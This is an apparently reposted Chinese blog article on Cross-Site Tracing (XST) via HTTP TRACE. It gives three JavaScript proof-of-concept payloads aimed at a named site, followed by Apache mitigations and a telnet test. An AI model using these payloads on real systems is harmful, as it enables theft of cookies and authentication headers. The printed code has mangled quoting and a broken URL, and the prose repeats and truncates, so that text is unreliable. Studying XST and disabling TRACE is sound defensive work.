http://www.guanwei.org/post/applicationsecurity/11/HTTP-TRACE.html 原文地址
TRACE和TRACK是用来调试web服务器连接的HTTP方式。
支持该方式的服务器存在跨站脚本漏洞,通常在描述各种浏览器缺陷的时候,把"Cross-Site-Tracing"简称为XST。
攻击者可以利用此漏洞欺骗合法用户并得到他们的私人信息。
解决方案: 禁用这些方式。
什么是“跨站攻击”呢?业界对其定义如下:“跨站攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行。”由于HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码,例如记录论坛保存的用户信息(Cookie),由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失。如这句简单的Java脚本就能轻易获取用户信息:alert(document.cookie),它会弹出一个包含用户信息的消息框。入侵者运用脚本就能把用户信息发送到他们自己的记录页面中,稍做分析便获取了用户的敏感信息。
跨站攻击有多种方式,典型的方式有两种:其一,由于HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码——例如记录论坛保存的用户信息(Cookie),由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失。其二,大家都知道,
XST攻击描述:
攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。
XST攻击条件:
1、需要目标web服务器允许Trace参数;
2、需要一个用来插入XST代码的地方;
3、目标站点存在跨域漏洞。
XST与XSS的比较:
相同点:都具有很大的欺骗性,可以对受害主机产生危害,而且这种攻击是多平台多技术的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。
优点:可以绕过一般的http验证以及NTLM验证
如何利用:
手法1:
<SCRIPT type=text/java script> <!-- function xssTRACE(){ var xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\"); xmlHttp.open(\"TRACE\",\"http://www.winshell.cn/swords/\",false); xmlHttp.send(); xmlDoc=xmlHttp.responseText; alert(xmlDoc); } //--> </SCRIPT> <BR><INPUT οnclick=xssTRACE(); type=button value=\"XSS TRACE\">手法2:
<SCRIPT type=text/java script> <!-- function xssTRACE() { var openopenWin=open(\"blank.htm\",\"swords\",\"width=500,height=400\"); var otraceswords=openWin.external; openWin.location.href=\http://www.winshell.cn/swords/\; setTimeout( function () { //以下必须写在一行 otraceswords.NavigateAndFind('java script:xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\",\"http://www.winshell.cn/\",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(\"不用document.cookie 显示站点http://www.winshell.cn/的头信息。\\n\" + xmlDoc);',\"\",\"\"); }, 1024 ); } //--> </SCRIPT>
手法3:
<SCRIPT type=text/java script> function xssTRACE(){ var swords = \"var xmlHttp = new ActiveXObject(\\"Microsoft.XMLHTTP\\")\;xmlHttp.open(\\"TRACE\\",\\"http://http://www.tingh.com/\\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;\"; var target = \http://www.winshell.cn/swords/\; spinach = encodeURIComponent(swords + ';top.close()'); var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))'; showModalDialog(target, null, readyCode); } </SCRIPT>
用apache+mysql+php在win2003架设web服务器,扫描服务器:
提示:
www (80/tcp)http TRACE 跨站攻击
你的webserver支持TRACE 和/或 TRACK 方式。 TRACE和TRACK是用来调试web服务器连接的HTTP方式。支持该方式的服务器存在跨站脚本漏洞,通常在描述各种浏览器缺陷的时候,把"Cross-Site-Tracing"简称为XST。攻击者可以利用此漏洞欺骗合法用户并得到他们的私人信息。
解决方案: 禁用这些方式。
虚拟主机用户可以在.htaccess文件中添加如下代码过滤TRACE请求:
RewriteEngine onRewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
服务器用户在httpd.conf尾部添加如下指令后重启apache即可:
TraceEnable off
测试方法:
$ telnet foo.com 80
Trying 127.0.0.1...
Connected to foo.bar.
Escape character is ‘^]’.TRACE / HTTP/1.1
Host: foo.bar
X-Header: testHTTP/1.1 200 OK
Date: Mon, 02 Dec 2002 19:24:51 GMT
Server: Apache/2.0.40 (Unix)
Content-Type: message/httpTRACE / HTTP/1.1
Host: foo.bar
X-Header: test
2901
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
